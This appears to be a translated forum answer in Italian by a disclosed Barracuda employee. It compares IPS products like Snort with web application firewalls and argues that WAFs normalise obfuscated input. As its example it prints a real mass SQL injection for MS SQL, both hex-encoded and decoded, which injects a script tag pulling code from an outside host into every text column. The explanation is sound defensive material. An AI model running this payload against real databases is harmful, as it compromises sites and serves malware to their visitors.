IPS come Snort sono più generalisti per la protezione di protocolli Internet comunemente usati come HTTP, DNS, FTP, SMTP, ecc.
I WAF dovrebbero essere specialisti per proteggere HTTP.
Solo per prendere attacchi di iniezione come SQLi, XSS come punto di partenza:
Puoi prendere alcune o tutte le firme di mod_security e provare a scrivere equivalenti per snort. Tuttavia, i prodotti IPS non hanno lo stesso livello di normalizzazione di [attacchi offuscati] [1], quindi sono facili da eludere. WAF come Barracuda, normalizzano gli input basati sul web prima che applichino le loro firme, questo previene il bypass usando hex / URL / UTF-8 / codifica Unicode, commenti SQL ecc.
Per esempio , a volte questa iniezione SQL di massa stava facendo il giro del Internet targeting MS SQL:
DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C41
....[more hex code]
26C655F437572736F7220 AS VARCHAR(4000));EXEC(@S);--
I WAF dovrebbero prima normalizzare il contenuto che diventa:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM
sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u'
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=
RTRIM(CONVERT(VARCHAR(4000),['+@C+']))
+''<script src=http://www.adwbnr.com/b.js>
</script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
Quindi applicare i controlli SQL per bloccarli.
Gli IPS, come lo snort, normalmente non forniscono protezione "zero-day" contro tali attacchi, forniscono firme specifiche a tali attacchi come le firme di botnet specifiche di Asprox ecc. E questi non sono efficaci contro le nuove vulnerabilità zero day.
Poi ci sono nuove forme di attacchi - come il parametro HTTP Pollution che nessun IPS difenderà, poiché implica l'esame, ad esempio, del valore concatenato di più parametri di input (? a = SEL & a = ECT).
Questa è solo una nota sugli attacchi di iniezione, ci sono molti altri attacchi che richiedono una comprensione più profonda del protocollo HTTP che è assente nella maggior parte dei prodotti IPS. Guida in sessione, CSRF, avvelenamento da cookie, riproduzione di cookie, ecc. Per citarne alcuni.
Puoi anche consultare questo white paper per una panoramica di alto livello.
Dichiarazione di non responsabilità: lavoro per Barracuda Networks, un rivenditore di WAF.